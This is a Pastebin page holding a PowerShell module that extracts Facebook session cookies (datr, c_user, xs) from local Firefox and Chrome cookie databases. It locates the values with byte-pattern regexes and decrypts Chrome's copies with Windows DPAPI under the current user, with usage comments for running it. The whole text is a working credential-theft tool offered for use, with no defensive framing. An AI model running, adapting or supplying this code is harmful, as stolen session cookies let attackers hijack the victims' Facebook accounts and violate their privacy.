Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Instructions: import the module, then perform the commanded needed.
- # Chrome Facebook cookies extraction
- # Use: Get-FacebookCreds [path to Login Data]
- # Path is optional, use if automatic search doesn't work
- function Get-FacebookCreds-Firefox() {
- Param(
- [String]$Path
- )
- if ([String]::IsNullOrEmpty($Path)) {
- # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
- $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
- }
- if (![system.io.file]::Exists($Path))
- {
- Write-Error 'Firefox db file doesnt exist, or invalid file path specified.'
- Break
- }
- Add-Type -AssemblyName System.Security
- # Credit to Matt Graber for his technique on using regular expressions to search for binary data
- $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
- $Encoding = [system.Text.Encoding]::GetEncoding(28591)
- $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
- $BinaryText = $StreamReader.ReadToEnd()
- $StreamReader.Close()
- $Stream.Close()
- # First the magic bytes for the facebook string, datr size is 24
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $datr = $PwdMatches.groups[1]
- "datr is $datr"
- # First the magic bytes for the facebook string, c_user size is 15
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $c_user = $PwdMatches.groups[1]
- "c_user is $c_user"
- # First the magic bytes for the facebook string, xs size is 44
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $xs = $PwdMatches.groups[1]
- "xs is $xs"
- }
- function Get-FacebookCreds-Chrome() {
- Param(
- [String]$Path
- )
- if ([String]::IsNullOrEmpty($Path)) {
- $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
- }
- if (![system.io.file]::Exists($Path))
- {
- Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
- Break
- }
- Add-Type -AssemblyName System.Security
- # Credit to Matt Graber for his technique on using regular expressions to search for binary data
- $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
- $Encoding = [system.Text.Encoding]::GetEncoding(28591)
- $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
- $BinaryText = $StreamReader.ReadToEnd()
- $StreamReader.Close()
- $Stream.Close()
- # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
- "datr is $DecPwd"
- # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
- "c_user is $DecPwd"
- # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
- "xs is $DecPwd"
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement